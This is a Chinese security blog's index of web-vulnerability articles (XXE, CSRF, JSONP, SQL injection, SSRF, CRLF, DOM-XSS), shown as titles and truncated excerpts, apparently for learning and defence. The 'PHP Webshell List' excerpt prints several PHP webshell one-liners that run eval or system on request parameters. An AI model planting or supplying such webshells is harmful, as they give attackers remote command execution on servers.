随笔分类 - WEB漏洞
XXE漏洞原理、检测与修复
摘要:目录What is XXE?XXE与XML注入的区别?XXE漏洞原理XXE的特征XXE测试在线工具:注意pyload任意读取文件测试代码审计XXE,基于Java语言修复方案Reference What is XXE? XML external entity injection (also known
阅读全文
CSRF的几种防御方法的利弊分析
摘要:本文直接从防御方式开始讨论,防御CSRF有4种方法: 使用POST替代GET 检验HTTP Referer 验证码 Token 使用POST替代GET 一些程序员在开发的时候都是用GET、POST通用的函数来接收客户端的数据,这样也是某些接口有CSRF的原因之一,但是将全部接口都改成只允许POST方
阅读全文
从JSONP到CORS的演化
摘要:目录同源策略JSONP原理JSONP的由来JSONP劫持的危害B站的JSONP跨域请求流程——案例检测是否存在JSONP劫持 —— 案例方式一 修改reference方式二 制作恶意脚步JSONP劫持的攻击流程场景设定攻击步骤分解关键漏洞分析JSONP劫持与CSRF的比较JSONP劫持的防御方案更详
阅读全文
Mybatis检查SQL注入——代码审计
摘要:目录如何排查为什么#{ }安全?什么情况下用不了#{ }? Mybatis 的 Mapper.xml 语句中 parameterType 向SQL语句传参有两种方式:#{ } 和 ${ } ; 简单来说: #{ }:是预编译处理,能有效防止 SQL 注入,适用于绝大多数场景。 ${ }:是字符串拼接
阅读全文
SSRF攻击原理
摘要:什么是SSRF 一个对外的Web接口,改接口能让用户控制curl命令,去访问别的web服务。 简图如下 想象一下当用户请求的baidu.com/x.php?image=google.com/1.jpg 改成 baidu.com/x.php?image=private.com/php.info,是不是
阅读全文
int型参数插入SQL语句笔记
摘要:目录mysql_real_escape_string()用法案例 类似PHP语言的 mysql_real_escape_string() 的函数,在用来防范SQL注入的时候,可能会遇到int型注入成功的情况。 mysql_real_escape_string()用法 mysql_real_escap
阅读全文
PHP Webshell List
摘要:基础类 很容易被扫描、检测出来 <?php @eval($_GET['phpcode']);?> <?php @eval($_POST['phpcode']);?> <?php @system($_GET['cmd']);?> <?php @system($_POST['cmd']);?> <?ph
阅读全文
CRLF注入(HTTP响应头拆分攻击)原理
摘要:目录测试插入其它响应头插入XSS原理分析修复方式 CRLF 指的是回车符(CR,ASCII 13,\r,%0d) 和换行符(LF,ASCII 10,\n,%0a),操作系统就是根据这个标识来进行换行的,你在键盘输入回车键就是输出这个字符,只不过Win和Linux系统用的标识不一样而已。 在HTTP当
阅读全文
DOM-XSS攻击原理与防御
摘要:目录XSSDOM文档利用原理DOM-XSS 场景一:innerHTMLDOM-XSS 场景二:跳转DOM-XSS 场景三:evalDOM-XSS 场景四:cookie、referrerDOM-XSS 场景五:document.write 、document.URL.indexOf("id=")防护策
阅读全文
XSS Payload List
摘要:目录标签、事件、属性HTML代码注入script标签a标签img标签 + onerror(都是通过event来调用js)button标签p标签 + onmouseover事件(都是通过event来调用js)body标签 + onload(都是通过event来调用js)var标签input标签 + 属
阅读全文
浙公网安备 33010602011771号